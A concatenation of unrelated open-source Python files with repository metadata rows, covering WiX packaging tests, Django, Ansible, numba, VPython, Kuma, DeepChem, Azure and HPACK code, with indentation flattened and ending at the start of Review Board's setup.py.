from cerbero.build import recipe
from cerbero.config import Platform
from cerbero.packages import package
from cerbero.packages.wix import MergeModule
from cerbero.utils import etree
from test.test_build_common import create_cookbook
from test.test_packages_common import create_store
from test.test_common import DummyConfig
class Recipe1(recipe.Recipe):
name = 'recipe-test'
files_misc = ['bin/test.exe', 'bin/test2.exe', 'bin/test3.exe',
'README', 'lib/libfoo.dll', 'lib/gstreamer-0.10/libgstplugins.dll']
class Package(package.Package):
name = 'gstreamer-test'
shortdesc = 'GStreamer Test'
longdesc = 'test'
version = '1.0'
licences = ['LGPL']
uuid = '1'
vendor = 'GStreamer Project'
files = ['recipe-test:misc']
MERGE_MODULE = '''\
<?xml version="1.0" ?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Module Id="_gstreamer_test" Language="1033" Version="1.0">
<Package Comments="test" Description="GStreamer Test" Id="1" Manufacturer="GStreamer Project"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Component Guid="1" Id="_readme">
<File Id="_readme_1" Name="README" Source="z:\\\\\\test\\\\README"/>
</Component>
<Directory Id="_bin" Name="bin">
<Component Guid="1" Id="_test.exe">
<File Id="_testexe" Name="test.exe" Source="z:\\\\\\test\\\\bin\\\\test.exe"/>
</Component>
<Component Guid="1" Id="_test2.exe">
<File Id="_test2exe" Name="test2.exe" Source="z:\\\\\\test\\\\bin\\\\test2.exe"/>
</Component>
<Component Guid="1" Id="_test3.exe">
<File Id="_test3exe" Name="test3.exe" Source="z:\\\\\\test\\\\bin\\\\test3.exe"/>
</Component>
</Directory>
<Directory Id="_lib" Name="lib">
<Directory Id="_gstreamer_0.10" Name="gstreamer-0.10">
<Component Guid="1" Id="_libgstplugins.dll">
<File Id="_libgstpluginsdll" Name="libgstplugins.dll" Source="z:\\\\\\test\\\\lib\\\\gstreamer-0.10\\\\libgstplugins.dll"/>
</Component>
</Directory>
<Component Guid="1" Id="_libfoo.dll">
<File Id="_libfoodll" Name="libfoo.dll" Source="z:\\\\\\test\\\\lib\\\\libfoo.dll"/>
</Component>
</Directory>
</Directory>
</Module>
</Wix>
'''
class MergeModuleTest(unittest.TestCase):
def setUp(self):
self.config = DummyConfig()
cb = create_cookbook(self.config)
store = create_store(self.config)
cb.add_recipe(Recipe1(self.config))
self.package = Package(self.config, store, cb)
self.mergemodule = MergeModule(self.config,
self.package.files_list(), self.package)
def test_add_root(self):
self.mergemodule._add_root()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi" />',
etree.tostring(self.mergemodule.root))
def test_add_module(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0" />'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_package(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_root_dir(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'<Directory Id="TARGETDIR" Name="SourceDir" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_directory(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_directory('lib/gstreamer-0.10')
self.assertEquals(len(self.mergemodule._dirnodes), 3)
self.assertTrue('lib' in self.mergemodule._dirnodes)
self.assertTrue('lib/gstreamer-0.10' in self.mergemodule._dirnodes)
self.mergemodule._add_directory('bin')
self.assertEquals(len(self.mergemodule._dirnodes), 4)
self.assertTrue('bin' in self.mergemodule._dirnodes)
def test_add_file(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_file('bin/gst-inspect-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
self.mergemodule._add_file('bin/gst-launch-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
def test_render_xml(self):
self.config.platform = Platform.WINDOWS
self.mergemodule._get_uuid = lambda : '1'
self.mergemodule.fill()
tmp = StringIO.StringIO()
self.mergemodule.write(tmp)
#self._compstr(tmp.getvalue(), MERGE_MODULE)
self.assertEquals(MERGE_MODULE, tmp.getvalue())
def _compstr(self, str1, str2):
str1 = str1.split('\n')
str2 = str2.split('\n')
for i in range(len(str1)):
if str1[i] != str2[i]:
print str1[i]
print str2[i]
print ""
class InstallerTest(unittest.TestCase):
def setUp(self):
pass
def testAddRoot(self):
pass
def testAddProduct(self):
pass
def testAddPackage(self):
pass
def testAddInstallDir(self):
pass
def testAddUIProps(self):
pass
def testAddMedia(self):
pass
def testAddMergeModules(self):
pass
def testRender(self):
pass
|
cee1/cerbero-mac
|
test/test_cerbero_packages_wix.py
|
Python
|
lgpl-2.1
| 8,020 | 0.006733 |
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
def __init__(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
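# Usage sketch (assumed): a management command mixing this in gains
# colored, dry-run-aware progress output, e.g.:
#
#     class Command(VerboseCommandMixin, BaseCommand):  # hypothetical
#         def handle(self, *args, **options):
#             self.verbose = True
#             self.msg('create', 'app/models.py')
#             self.log('done')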
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py
|
Python
|
apache-2.0
| 1,463 | 0 |
"""Dummy module to create rax security groups"""
#!/usr/bin/env python
import pyrax
from ansible.module_utils.basic import *
uri_sgs = 'https://dfw.networks.api.rackspacecloud.com/v2.0/security-groups'
def get_sg(cnw, name):
try:
result, sgs = cnw.identity.method_get(uri_sgs)
if result.status_code == 200:
sg_list = filter(lambda sg: sg['name'] == name,
sgs['security_groups'])
return result.status_code, sg_list
except Exception as e:
return e.code, {'status': e.code, 'message': e.message}
def rax_security_group_present(data):
name = data['name']
description = data['description']
cnw = pyrax.cloud_networks
# If already exists, just return the first matching id
result, sg_list = get_sg(cnw, name)
if sg_list:
return False, False, sg_list[0]
data_json = {
'security_group': {
'name': name,
'description' : description
}
}
try:
result, sg = cnw.identity.method_post(uri_sgs, data=data_json)
if result.status_code == 201:
return False, True, result.json()['security_group']
elif result.status_code == 422:
return False, False, result.json()
else:
return True, False, {'status': result.status_code, 'data':
result.json()}
except Exception as e:
return True, False, {'status': 'ERROR', 'data': e.message}
def rax_security_group_absent(data=None):
cnw = pyrax.cloud_networks
name = data['name']
status_code, sg_list = get_sg(cnw, name)
result = None
for sg in sg_list:
sg_id = sg['id']
try:
result, _ = cnw.identity.method_delete(uri_sgs + '/' + sg_id)
if result.status_code == 200:
continue
except pyrax.exceptions.ClientException as e:
if e.code == 409:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id,
'data': 'Security group in use'
}
except Exception as e:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id}
if result:
return False, True, {'status': 'deleted', 'deleted_security_groups':
[sg['id'] for sg in sg_list]}
else:
return False, False, {'status': 'security group not found', 'security_groups':
sg_list}
def main():
fields = {
'name': {'required': True, 'type': 'str'},
'description': {'required': False, 'type': 'str'},
'region': {'required': True, 'type': 'str'},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
'type': 'str'
}
}
choice_map = {
'present': rax_security_group_present,
'absent': rax_security_group_absent
}
module = AnsibleModule(argument_spec=fields)
pyrax.set_setting('identity_type', 'rackspace')
pyrax.set_credential_file('rax.py')
pyrax.set_setting('region', module.params['region'])
is_error, has_changed, result = \
choice_map.get(module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, security_group=result)
else:
module.fail_json(msg='Error', security_group=result)
if __name__ == '__main__':
main()
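# Example playbook usage (assumed; all values are placeholders):
#
#     - name: Ensure a security group exists
#       rax_security_group:
#         name: web-sg
#         description: allow web traffic
#         region: DFW
#         state: present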
|
xroot88/rax_ansible
|
library/rax_security_group.py
|
Python
|
apache-2.0
| 3,554 | 0.002532 |
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Module, Type, Builder, InlineAsm
from llvmlite import binding as ll
from numba.cuda.cudadrv import nvvm
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
@skip_on_cudasim('Inline PTX cannot be used in the simulator')
class TestCudaInlineAsm(CUDATestCase):
def test_inline_rsqrt(self):
mod = Module.new(__name__)
fnty = Type.function(Type.void(), [Type.pointer(Type.float())])
fn = mod.add_function(fnty, 'cu_rsqrt')
bldr = Builder.new(fn.append_basic_block('entry'))
rsqrt_approx_fnty = Type.function(Type.float(), [Type.float()])
inlineasm = InlineAsm.get(rsqrt_approx_fnty,
'rsqrt.approx.f32 $0, $1;',
'=f,f', side_effect=True)
val = bldr.load(fn.args[0])
res = bldr.call(inlineasm, [val])
bldr.store(res, fn.args[0])
bldr.ret_void()
# generate ptx
nvvm.fix_data_layout(mod)
nvvm.set_cuda_kernel(fn)
nvvmir = str(mod)
ptx = nvvm.llvm_to_ptx(nvvmir)
self.assertTrue('rsqrt.approx.f32' in str(ptx))
if __name__ == '__main__':
unittest.main()
|
GaZ3ll3/numba
|
numba/cuda/tests/cudadrv/test_inline_ptx.py
|
Python
|
bsd-2-clause
| 1,302 | 0 |
# -*- coding: utf-8 -*-
import os
"""Clock for VPython - Complex (cx@cx.hu) 2003. - Licence: Python
Usage:
from visual import *
from cxvp_clock import *
clk=Clock3D()
while 1:
rate(1)
clk.update()
See doc strings for more.
Run this module to test clocks.
TODO: More types of clocks, such as 3D digital,
church clock, hour-glass, pendulum clock, stopper, etc...
Modifications:
2003.01.23. - Complex (cx@cx.hu): First release
2003.01.23. - Complex (cx@cx.hu): now gmtime imported correctly
"""
__all__ = ['Clock3D']
from visual import *
from visual.text import text
from time import time, localtime, gmtime
from math import sin, cos, pi
def Clock3D(clock_type='analog', *args, **kw):
"""Create a clock with specified type,
keyword arguments are passed through,
returns a VPython object derived from frame"""
if clock_type == 'analog':
return AnalogClock(*args, **kw)
    raise ValueError('Invalid 3D clock type: %r' % (clock_type,))
class Base(object):
"""Base class to pass specific keyword
arguments with convenient defaults"""
    def __init__(self, kwlist=None, *args, **kw):
        if kwlist is None:
            kwlist = {}
        self.kwlist = kwlist
        for k, v in kwlist.items():
            if k in kw:
                v = kw[k]
                del kw[k]
            self.__dict__[k] = v
self.args = args
self.kw = kw
class AnalogClock(Base):
"""Analog clock, keyword arguments:
frame=reference frame to use (default: None),
pointers=pointers to display, cobination of characters 'h', 'm' and 's' (default: 'hms')
ring_color=color of ring around the clock (default: color.yellow)
back_color=color of clock's back plate (default: color.white)
big_tick_color=color of big ticks (at 12,3,6,9 hours) (default: color.red)
small_tick_color=color of small ticks (at 1,2,4,5,7,8,10,11 hours) (default: color.blue)
minute_dot_color=color of minute dots between ticks (default: (0.4,0.4,0.4))
number_color=color of hour numbers (default: color.black)
hour_pointer_color=color of hour pointer (default: color.red)
minute_pointer_color=color of hour pointer (default: color.blue)
second_pointer_color=color of hour pointer (default: (0.4,0.4,0.4))
"""
def __init__(self, *args, **kw):
"""Create primitives of clock"""
Base.__init__(self, {
'frame': None,
'pointers': 'hms',
'ring_color': color.yellow,
'back_color': color.white,
'big_tick_color': color.red,
'small_tick_color': color.blue,
'minute_dot_color': (0.4, 0.4, 0.4),
'number_color': color.black,
'hour_pointer_color': color.red,
'minute_pointer_color': color.blue,
'second_pointer_color': (0.4, 0.4, 0.4)}, *args, **kw)
if not self.frame:
self.frame = frame(*self.args, **self.kw)
pl = list(self.pointers)
hp, mp, sp = 'h' in pl, 'm' in pl, 's' in pl
ring(frame=self.frame, axis=(0, 0, 1), radius=1,
thickness=0.05, color=self.ring_color)
cylinder(frame=self.frame, pos=(0, 0, -0.03),
axis=(0, 0, 0.02), radius=1, color=self.back_color)
for i in range(60):
a = pi * i / 30.0
if i % 5 == 0:
j = i / 5
if j % 3:
c, h = self.small_tick_color, 0.06
else:
c, h = self.big_tick_color, 0.12
box(frame=self.frame, pos=(0.99, 0, 0), length=0.14, height=h,
width=0.12, color=c).rotate(angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
t = text(pos=(0.8 * sin(a), 0.8 * cos(a) - 0.06, 0), axis=(1, 0, 0), height=0.12,
string=str(j + 12 * (not j)), color=self.number_color, depth=0.02, justify='center')
for o in t.objects:
o.frame.frame = self.frame
else:
sphere(frame=self.frame, pos=(1, 0, 0.05), radius=0.01, color=self.minute_dot_color).rotate(
angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
if hp:
self.hf = hf = frame(frame=self.frame)
cylinder(frame=hf, pos=(0, 0, -0.01), axis=(0, 0, 0.02),
radius=0.08, color=self.hour_pointer_color)
box(frame=hf, pos=(0.25, 0, 0.005), axis=(0.5, 0, 0),
height=0.04, width=0.01, color=self.hour_pointer_color)
else:
self.hf = None
if mp:
self.mf = mf = frame(frame=self.frame)
cylinder(frame=mf, pos=(0, 0, 0.01), axis=(0, 0, 0.02),
radius=0.06, color=self.minute_pointer_color)
box(frame=mf, pos=(0.35, 0, 0.025), axis=(0.7, 0, 0),
height=0.03, width=0.01, color=self.minute_pointer_color)
else:
self.mf = None
if sp:
self.sf = sf = frame(frame=self.frame)
cylinder(frame=sf, pos=(0, 0, 0.03), axis=(0, 0, 0.02),
radius=0.04, color=self.second_pointer_color)
box(frame=sf, pos=(0.4, 0, 0.045), axis=(0.8, 0, 0),
height=0.02, width=0.01, color=self.second_pointer_color)
else:
self.sf = None
self.update()
def update(self, unixtime=None, gmt=0):
"""Update clock to specific unix timestamp
or current local time if not specified or None,
use GMT time if gmt is true"""
        if unixtime is None:
unixtime = time()
if gmt:
tm = gmtime(unixtime)
else:
tm = localtime(unixtime)
h, m, s = tm[3:6]
ts = h * 3600 + m * 60 + s
aml = [2.0 / 86400.0, 1.0 / 3600.0, 1.0 / 60.0]
for am, f in zip(aml, [self.hf, self.mf, self.sf]):
if not f:
continue
a = 2 * pi * ts * am
f.axis = ax = rotate((0, 1, 0), angle=-a, axis=(0, 0, 1))
f.up = cross(vector(0, 0, 1), ax)
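# Worked check of the angle factors used in update() (explanatory note, not in
# the original): the hour hand makes one full revolution per 12 h (43200 s),
# i.e. a fraction 1/43200 = 2.0/86400.0 of a turn per second; the minute hand
# turns once per 3600 s and the second hand once per 60 s. With ts seconds
# since midnight, each hand's angle is a = 2*pi*ts*am for its entry in aml.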
def TestClocks():
scene.title = 'cx_clock test'
tl = [('analog', 0, 0, -pi / 6)]
clk = []
for t, x, y, r in tl:
frm = frame(pos=(x, y, -0.3), axis=(1, 0, 0),
up=rotate((0, 1, 0), axis=(1, 0, 0), angle=r), visible=0)
clk.append(Clock3D(t, frame=frm))
while 1:
rate(1)
for c in clk:
c.update()
c.frame.visible = 1
if __name__ == '__main__':
TestClocks()
os.system("pause")
|
NicovincX2/Python-3.5
|
Divers/draw_a_clock_vpython.py
|
Python
|
gpl-3.0
| 6,444 | 0.001552 |
"""
Apply access on a harmonization dataset.
"""
import sys
import pycurl
import mica.core
import mica.access
def add_arguments(parser):
"""
Add command specific options
"""
mica.access.add_permission_arguments(parser, True)
parser.add_argument('id', help='Harmonization dataset ID')
def do_command(args):
"""
Execute access command
"""
# Build and send requests
try:
mica.access.validate_args(args)
request = mica.core.MicaClient.build(mica.core.MicaClient.LoginInfo.parse(args)).new_request()
if args.verbose:
request.verbose()
# send request
if args.delete:
request.delete()
else:
request.put()
        response = request.resource(mica.access.do_ws(args, ['draft', 'harmonization-dataset', args.id, 'accesses'])).send()
        # format response
        if response.code != 204:
            print response.content
    except pycurl.error, error:
        errno, errstr = error
        print >> sys.stderr, 'An error occurred: ', errstr
        sys.exit(2)
    except Exception, e:
        print e
        sys.exit(2)
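# Hypothetical command-line sketch (added note, not in the original file): this
# module plugs into the mica CLI as a subcommand, so an invocation would look
# roughly like the line below; the exact permission flags come from
# mica.access.add_permission_arguments and are assumptions here.
#     mica access-harmonization-dataset my-dataset-id --type USER --subject jdoe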
|
apruden/mica2
|
mica-python-client/src/main/python/mica/access_harmonization_dataset.py
|
Python
|
gpl-3.0
| 1,215 | 0.004115 |
from cloudify.workflows import ctx, parameters
ctx.logger.info(parameters.node_id)
instance = [n for n in ctx.node_instances
if n.node_id == parameters.node_id][0]
for relationship in instance.relationships:
relationship.execute_source_operation('custom_lifecycle.custom_operation')
|
cloudify-cosmo/cloudify-manager
|
tests/integration_tests/resources/dsl/deployment_update/modify_relationship_operation/modification/custom_workflow.py
|
Python
|
apache-2.0
| 304 | 0 |
import datetime
import json
from constance.test import override_config
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from django.utils.http import parse_http_date_safe
from kuma.core.urlresolvers import reverse
from kuma.users.tests import UserTestCase
from kuma.wiki.models import DocumentAttachment
from kuma.wiki.tests import WikiTestCase, document, revision
from ..models import Attachment, AttachmentRevision
from . import make_test_file
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='text/plain')
class AttachmentViewTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentViewTests, self).setUp()
self.client.login(username='admin', password='testpass')
self.revision = revision(save=True)
self.document = self.revision.document
self.files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': self.document.slug},
locale='en-US')
@transaction.atomic
def _post_attachment(self):
file_for_upload = make_test_file(
content='A test file uploaded into kuma.')
post_data = {
'title': 'Test uploaded file',
'description': 'A test file uploaded into kuma.',
'comment': 'Initial upload',
'file': file_for_upload,
}
response = self.client.post(self.files_url,
data=post_data)
return response
def test_legacy_redirect(self):
test_user = self.user_model.objects.get(username='testuser2')
test_file_content = 'Meh meh I am a test file.'
test_files = (
{'file_id': 97, 'filename': 'Canvas_rect.png',
'title': 'Canvas rect'},
{'file_id': 107, 'filename': 'Canvas_smiley.png',
'title': 'Canvas smiley'},
{'file_id': 86, 'filename': 'Canvas_lineTo.png',
'title': 'Canvas lineTo'},
{'file_id': 55, 'filename': 'Canvas_arc.png',
'title': 'Canvas arc'},
)
for test_file in test_files:
attachment = Attachment(
title=test_file['title'],
mindtouch_attachment_id=test_file['file_id'],
)
attachment.save()
now = datetime.datetime.now()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=test_file['title'],
description='',
created=now,
is_approved=True)
revision.creator = test_user
revision.file.save(test_file['filename'],
ContentFile(test_file_content))
revision.make_current()
mindtouch_url = reverse('attachments.mindtouch_file_redirect',
args=(),
kwargs={'file_id': test_file['file_id'],
'filename': test_file['filename']})
response = self.client.get(mindtouch_url)
self.assertRedirects(response, attachment.get_file_url(),
status_code=301,
fetch_redirect_response=False)
def test_get_request(self):
response = self.client.get(self.files_url, follow=True)
self.assertRedirects(response, self.document.get_edit_url())
def test_edit_attachment(self):
response = self._post_attachment()
self.assertRedirects(response, self.document.get_edit_url())
attachment = Attachment.objects.get(title='Test uploaded file')
rev = attachment.current_revision
self.assertEqual(rev.creator.username, 'admin')
self.assertEqual(rev.description, 'A test file uploaded into kuma.')
self.assertEqual(rev.comment, 'Initial upload')
self.assertTrue(rev.is_approved)
def test_attachment_raw_requires_attachment_host(self):
response = self._post_attachment()
attachment = Attachment.objects.get(title='Test uploaded file')
url = attachment.get_file_url()
response = self.client.get(url)
self.assertRedirects(response, url,
fetch_redirect_response=False,
status_code=301)
response = self.client.get(url, HTTP_HOST=settings.ATTACHMENT_HOST)
self.assertTrue(response.streaming)
self.assertEqual(response['x-frame-options'],
'ALLOW-FROM %s' % settings.DOMAIN)
self.assertEqual(response.status_code, 200)
self.assertIn('Last-Modified', response)
self.assertNotIn('1970', response['Last-Modified'])
self.assertIn('GMT', response['Last-Modified'])
self.assertIsNotNone(parse_http_date_safe(response['Last-Modified']))
def test_get_previous(self):
"""
        AttachmentRevision.get_previous() should return this revision's
        file's most recent approved revision."""
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision1 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision1.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision1.save()
revision1.make_current()
revision2 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='First edit..',
created=datetime.datetime.now(),
creator=test_user,
is_approved=True)
revision2.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision2.save()
revision2.make_current()
self.assertEqual(revision1, revision2.get_previous())
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='application/x-super-weird')
def test_mime_type_filtering(self):
"""
Don't allow uploads outside of the explicitly-permitted
mime-types.
"""
_file = make_test_file(content='plain and text', suffix='.txt')
post_data = {
'title': 'Test disallowed file type',
'description': 'A file kuma should disallow on type.',
'comment': 'Initial upload',
'file': _file,
}
response = self.client.post(self.files_url, data=post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Files of this type are not permitted.')
_file.close()
def test_intermediate(self):
"""
Test that the intermediate DocumentAttachment gets created
correctly when adding an Attachment with a document_id.
"""
doc = document(locale='en-US',
slug='attachment-test-intermediate',
save=True)
revision(document=doc, is_approved=True, save=True)
file_for_upload = make_test_file(
content='A file for testing intermediate attachment model.')
post_data = {
'title': 'Intermediate test file',
'description': 'Intermediate test file',
'comment': 'Initial upload',
'file': file_for_upload,
}
files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': doc.slug},
locale='en-US')
response = self.client.post(files_url, data=post_data)
self.assertEqual(response.status_code, 302)
self.assertEqual(doc.files.count(), 1)
intermediates = DocumentAttachment.objects.filter(document__pk=doc.id)
self.assertEqual(intermediates.count(), 1)
intermediate = intermediates[0]
self.assertEqual(intermediate.attached_by.username, 'admin')
self.assertEqual(intermediate.name,
file_for_upload.name.split('/')[-1])
def test_feed(self):
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision.save()
revision.make_current()
feed_url = reverse('attachments.feeds.recent_files', locale='en-US',
args=(), kwargs={'format': 'json'})
response = self.client.get(feed_url)
data = json.loads(response.content)
self.assertEqual(len(data), 1)
self.assertEqual(data[0]['title'], revision.title)
self.assertEqual(data[0]['link'], revision.attachment.get_file_url())
self.assertEqual(data[0]['author_name'], test_user.username)
|
safwanrahman/kuma
|
kuma/attachments/tests/test_views.py
|
Python
|
mpl-2.0
| 9,771 | 0 |
"""
Script that trains graph-conv models on Tox21 dataset.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import json
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
import deepchem as dc
from deepchem.molnet import load_tox21
from deepchem.models.tensorgraph.models.graph_models import PetroskiSuchModel
model_dir = "/tmp/graph_conv"
# Load Tox21 dataset
tox21_tasks, tox21_datasets, transformers = load_tox21(
featurizer='AdjacencyConv')
train_dataset, valid_dataset, test_dataset = tox21_datasets
print(train_dataset.data_dir)
print(valid_dataset.data_dir)
# Fit models
metric = dc.metrics.Metric(
dc.metrics.roc_auc_score, np.mean, mode="classification")
# Batch size of models
batch_size = 128
model = PetroskiSuchModel(
len(tox21_tasks), batch_size=batch_size, mode='classification')
model.fit(train_dataset, nb_epoch=10)
print("Evaluating model")
train_scores = model.evaluate(train_dataset, [metric], transformers)
valid_scores = model.evaluate(valid_dataset, [metric], transformers)
print("Train scores")
print(train_scores)
print("Validation scores")
print(valid_scores)
|
Agent007/deepchem
|
examples/tox21/tox21_graphcnn.py
|
Python
|
mit
| 1,211 | 0.003303 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Domain(Model):
"""Active Directory Domain information.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
     deserialized to this collection
:type additional_properties: dict[str, object]
:ivar authentication_type: the type of the authentication into the domain.
:vartype authentication_type: str
:ivar is_default: if this is the default domain in the tenant.
:vartype is_default: bool
:ivar is_verified: if this domain's ownership is verified.
:vartype is_verified: bool
:param name: Required. the domain name.
:type name: str
"""
_validation = {
'authentication_type': {'readonly': True},
'is_default': {'readonly': True},
'is_verified': {'readonly': True},
'name': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'authentication_type': {'key': 'authenticationType', 'type': 'str'},
'is_default': {'key': 'isDefault', 'type': 'bool'},
'is_verified': {'key': 'isVerified', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, *, name: str, additional_properties=None, **kwargs) -> None:
super(Domain, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.authentication_type = None
self.is_default = None
self.is_verified = None
self.name = name
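# Minimal usage sketch (added commentary, not part of the generated client):
# 'name' is the only caller-settable required field; the read-only fields stay
# None until populated from a service response during deserialization.
#     d = Domain(name='contoso.com', additional_properties={'note': 'example'})
#     assert d.is_verified is None  # server-populated, ignored on requests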
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/domain_py3.py
|
Python
|
mit
| 2,154 | 0.000464 |
# -*- coding: utf-8 -*-
"""
This module defines substantial HPACK integration tests. These can take a very
long time to run, so they're outside the main test suite, but they need to be
run before every change to HPACK.
"""
from hpack.hpack import Decoder, Encoder
from binascii import unhexlify
from pytest import skip
class TestHPACKDecoderIntegration(object):
def test_can_decode_a_story(self, story):
d = Decoder()
# We test against draft 9 of the HPACK spec.
if story['draft'] != 9:
skip("We test against draft 9, not draft %d" % story['draft'])
for case in story['cases']:
try:
d.header_table_size = case['header_table_size']
except KeyError:
pass
decoded_headers = d.decode(unhexlify(case['wire']))
# The correct headers are a list of dicts, which is annoying.
correct_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
assert correct_headers == decoded_headers
def test_can_encode_a_story_no_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=False)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
def test_can_encode_a_story_with_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=True)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
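# Shape of the fixture data these tests consume (a sketch inferred from the
# parsing code above, not from the fixture files themselves):
#     story = {
#         'draft': 9,
#         'cases': [
#             {'wire': '<hex-encoded header block>',
#              'headers': [{':method': 'GET'}, {':path': '/'}],
#              'header_table_size': 4096},  # header_table_size is optional
#         ],
#     }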
|
jimcarreer/hpack
|
test/test_hpack_integration.py
|
Python
|
mit
| 2,084 | 0.001919 |
#!/usr/bin/env python
#
# Setup script for Review Board.
#
# A big thanks to Django project for some of the fixes used in here for
# MacOS X and data files installation.
import os
import shutil
import sys
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.build_py import build_py
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
from reviewboard import get_package_version, is_release, VERSION
# Make sure we're actually in the directory containing setup.py.
root_dir = os.path.dirname(__file__)
